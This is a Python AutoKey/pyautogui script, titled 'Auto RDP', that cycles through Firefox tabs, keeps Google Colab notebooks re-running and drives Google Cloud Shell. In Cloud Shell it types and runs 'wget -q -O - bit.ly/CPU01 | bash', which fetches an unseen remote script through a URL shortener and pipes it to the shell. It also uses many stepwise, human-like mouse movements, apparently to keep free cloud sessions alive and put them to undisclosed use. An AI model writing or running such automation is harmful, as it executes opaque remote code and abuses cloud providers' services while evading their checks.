# Auto RDP
import time
from autokey import *
import pyautogui

pyautogui.FAILSAFE = False
winTitle = window.get_active_title()
winClass = window.get_active_class()    
mouse.wait_for_click(1)
time.sleep(1)

#size_x = window.get_property(property_name, 0, 0, 255)
#size_y = window.get_property(property_name, 0, 0, 255)
i=0
while (i == 0):
    i=0
    time.sleep(2)
    winTitle = window.get_active_title()
    winClass = window.get_active_class()
    if ( winClass == "Navigator.Firefox" ) :
        if  winTitle.find("Colaboratory") != -1 :
            #### Auto refresh page ####
            pyautogui.moveTo(800, 879)
            pyautogui.mouseDown(813, 851, 'left')
            pyautogui.mouseUp(813, 851, 'left')
            time.sleep(2)
            pyautogui.keyDown('f5')
            pyautogui.keyUp('f5')
            time.sleep(3)
            pyautogui.moveTo(825, 828)
            pyautogui.moveTo(854, 784)
            pyautogui.moveTo(891, 749)
            pyautogui.moveTo(925, 726)
            pyautogui.moveTo(952, 708)
            pyautogui.moveTo(973, 685)
            pyautogui.moveTo(997, 656)
            pyautogui.moveTo(1021, 634)
            pyautogui.moveTo(1046, 615)
            pyautogui.moveTo(1068, 596)
            pyautogui.moveTo(1089, 568)
            pyautogui.mouseDown(1089, 568, 'left')
            pyautogui.mouseUp(1089, 568, 'left')
            time.sleep(25)
            pyautogui.moveTo(1087, 591)
            pyautogui.moveTo(1047, 617)
            pyautogui.moveTo(950, 641)
            pyautogui.moveTo(870, 663)
            time.sleep(1)
            keyboard.send_keys("<ctrl>+<enter>")
            time.sleep(2)
  

            ###############################
            time.sleep(0.5)
            pyautogui.moveTo(80, 350)
            pyautogui.moveTo(80, 351)
            time.sleep(0.2)
            pyautogui.moveTo(79, 352)
            time.sleep(0.1)
            pyautogui.moveTo(80, 355)
            time.sleep(0.1)
            pyautogui.mouseDown(80, 355, 'left')
            pyautogui.mouseUp(80, 355, 'left')
            time.sleep(3)
            keyboard.send_keys("<ctrl>+<enter>")
            time.sleep(5)
            pyautogui.mouseDown(1018, 724, 'left')
            pyautogui.mouseUp(1018, 724, 'left')
            time.sleep(2)
            pyautogui.mouseDown(1018, 724, 'left')
            pyautogui.mouseUp(1018, 724, 'left')
            pyautogui.moveTo(768, 1099)
            time.sleep(5)

            keyboard.send_keys("<ctrl>+<np_page_up>")
            # #mouse.click_relative_self(1070, 600, 1)
            #   mouse.click_absolute(1070, 600, 1)

        elif  winTitle.find("Cloud Shell") != -1 :            
            time.sleep(0.5)
            #keyboard.send_keys("<ctrl>+<np_page_up>")
            #dialog.info_dialog("Test","Colab")

            ### New shell agree ###
            pyautogui.moveTo(626, 1012)
            pyautogui.mouseDown(480, 673, 'left')
            pyautogui.mouseUp(480, 673, 'left')
            time.sleep(1)
            pyautogui.mouseDown(577, 765, 'left')
            pyautogui.mouseUp(577, 765, 'left')
            time.sleep(2)
            pyautogui.moveTo(668, 909)
            pyautogui.moveTo(685, 930)
            pyautogui.moveTo(697, 953)
            pyautogui.moveTo(697, 974)
            pyautogui.moveTo(685, 1006)
            pyautogui.moveTo(674, 1038)
            ### Refresh if dead session ####
            pyautogui.moveTo(1012, 852)
            pyautogui.moveTo(1039, 665)
            pyautogui.moveTo(1079, 608)
            pyautogui.moveTo(1105, 573)
            pyautogui.moveTo(1173, 520)
            pyautogui.moveTo(1274, 448)
            pyautogui.moveTo(1338, 417)
            pyautogui.moveTo(1376, 395)
            pyautogui.moveTo(1412, 383)
            pyautogui.moveTo(1433, 374)
            pyautogui.moveTo(1455, 362)
            pyautogui.moveTo(1476, 339)
            pyautogui.moveTo(1502, 315)
            pyautogui.moveTo(1530, 288)
            pyautogui.moveTo(1552, 235)
            pyautogui.moveTo(1556, 258)
            pyautogui.mouseDown(1539, 255, 'left')
            pyautogui.mouseUp(1539, 255, 'left')
            time.sleep(2)
            pyautogui.moveTo(1506, 292)
            pyautogui.moveTo(1479, 318)
            pyautogui.moveTo(1433, 356)
            pyautogui.moveTo(1394, 383)
            pyautogui.moveTo(1356, 405)
            pyautogui.moveTo(1312, 427)
            pyautogui.moveTo(1258, 464)
            pyautogui.moveTo(1155, 515)
            pyautogui.moveTo(1089, 550)
            pyautogui.moveTo(1039, 574)
            pyautogui.moveTo(976, 600)
            pyautogui.moveTo(911, 633)
            pyautogui.moveTo(826, 665)
            pyautogui.moveTo(783, 688)
            time.sleep(53)
            ### shell exec cmd ###
            pyautogui.mouseDown(668, 574, 'left')
            pyautogui.mouseUp(668, 574, 'left')
            time.sleep(1)
            pyautogui.keyDown('enter')
            pyautogui.keyUp('enter')
            pyautogui.keyDown('enter')
            pyautogui.keyUp('enter')
            time.sleep(9)
            pyautogui.keyDown('w')
            pyautogui.keyUp('w')
            pyautogui.keyDown('g')
            pyautogui.keyUp('g')
            pyautogui.keyDown('e')
            pyautogui.keyUp('e')
            pyautogui.keyDown('t')
            pyautogui.keyUp('t')
            keyboard.send_keys(" -q -O - bit.ly/CPU01 | bash")
            time.sleep(1)
            pyautogui.keyDown('enter')
            pyautogui.keyUp('enter')
            time.sleep(1)
            pyautogui.keyDown('enter')
            pyautogui.keyUp('enter')
            pyautogui.moveTo(805, 680)
            pyautogui.moveTo(830, 712)
            pyautogui.moveTo(853, 727)
            pyautogui.moveTo(880, 745)
            pyautogui.moveTo(903, 762)
            pyautogui.moveTo(939, 779)
            pyautogui.moveTo(962, 792)
            pyautogui.moveTo(982, 814)
            pyautogui.moveTo(994, 841)
            time.sleep(5)
            ### next page ###
            keyboard.send_keys("<ctrl>+<np_page_up>")
        else :
            time.sleep(5)
            keyboard.send_keys("<ctrl>+<np_page_up>")
            #dialog.info_dialog("Test","Firefox")
    else  :   
        time.sleep(5)